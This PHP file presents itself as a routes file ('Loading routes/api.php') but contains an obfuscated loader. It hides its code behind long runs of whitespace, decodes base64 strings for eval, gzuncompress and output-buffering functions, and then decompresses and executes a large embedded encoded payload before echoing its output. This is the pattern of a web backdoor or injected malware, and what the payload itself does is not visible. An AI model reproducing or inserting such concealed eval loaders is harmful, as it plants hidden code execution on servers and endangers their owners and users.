<?php 
        $__='printf';$_='Loading routes/api.php';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
